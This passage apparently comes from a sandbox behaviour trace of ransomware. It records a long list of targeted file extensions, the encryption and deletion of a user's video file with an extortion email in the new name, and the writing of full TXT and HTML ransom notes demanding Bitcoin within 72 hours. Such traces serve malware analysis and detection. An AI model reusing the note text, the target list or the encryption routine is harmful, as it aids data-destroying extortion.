gif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".flv") returned=".flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0199.571] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.572] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.572] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0199.575] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3ea2, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x3ea2, lpOverlapped=0x0) returned 1
	[0199.577] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.577] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0199.580] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.580] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0199.580] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.581] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0199.581] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.581] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9130) returned 1
	[0199.581] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.581] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x3ea2, dwBufLen=0x3ea2 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x3eb0) returned 1
	[0199.582] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.582] RtlMoveMemory (in: Destination=0xfe1030, Source=0xfdd180, Length=0x3ea2 | out: Destination=0xfe1030) 
	[0199.582] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.582] CryptEncrypt (in: hKey=0xfb9130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1030*, pdwDataLen=0x18aefc*=0x3ea2, dwBufLen=0x3eb0 | out: pbData=0xfe1030*, pdwDataLen=0x18aefc*=0x3eb0) returned 1
	[0199.582] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.582] CryptDestroyKey (hKey=0xfb9130) returned 1
	[0199.582] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.583] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0199.583] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.583] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0199.583] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.583] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.584] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0199.585] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 110
	[0199.585] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0199.586] WriteFile (in: hFile=0x388, lpBuffer=0xfe1030*, nNumberOfBytesToWrite=0x3eb0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe1030*, lpNumberOfBytesWritten=0x18b358*=0x3eb0, lpOverlapped=0x0) returned 1
	[0199.589] CloseHandle (hObject=0x388) returned 1
	[0199.589] CloseHandle (hObject=0x2c0) returned 1
	[0199.589] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv")) returned 1
	[0199.595] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\o5w4xg5 p4g tu.flv")) returned 0
	[0199.595] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0xf54d5100, ftLastAccessTime.dwHighDateTime=0x1d9722d, ftLastWriteTime.dwLowDateTime=0xf54d5100, ftLastWriteTime.dwHighDateTime=0x1d9722d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pz4QOFg", cAlternateFileName="")) returned 1
	[0199.596] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bf88d70, ftCreationTime.dwHighDateTime=0x1d96cff, ftLastAccessTime.dwLowDateTime=0xf54d5100, ftLastAccessTime.dwHighDateTime=0x1d9722d, ftLastWriteTime.dwLowDateTime=0xf54d5100, ftLastWriteTime.dwHighDateTime=0x1d9722d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pz4QOFg", cAlternateFileName="")) returned 0
	[0199.596] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0199.597] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0199.597] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ"
	[0199.597] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*"
	[0199.597] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.598] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.598] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\HELP_DECRYPT_YOUR_FILES.TXT") returned 77
	[0199.598] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0199.598] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0199.598] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0199.601] CloseHandle (hObject=0x384) returned 1
	[0199.601] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.602] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.602] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0199.604] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0199.604] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0199.604] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0199.605] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0199.605] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0199.605] CloseHandle (hObject=0x384) returned 1
	[0199.605] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0199.605] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0199.606] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0199.606] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\HELP_DECRYPT_YOUR_FILES.HTML") returned 78
	[0199.606] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0199.608] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0199.608] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0199.612] CloseHandle (hObject=0x384) returned 1
	[0199.612] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.612] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0199.613] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0199.613] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0199.614] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0199.614] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0199.614] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0199.614] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
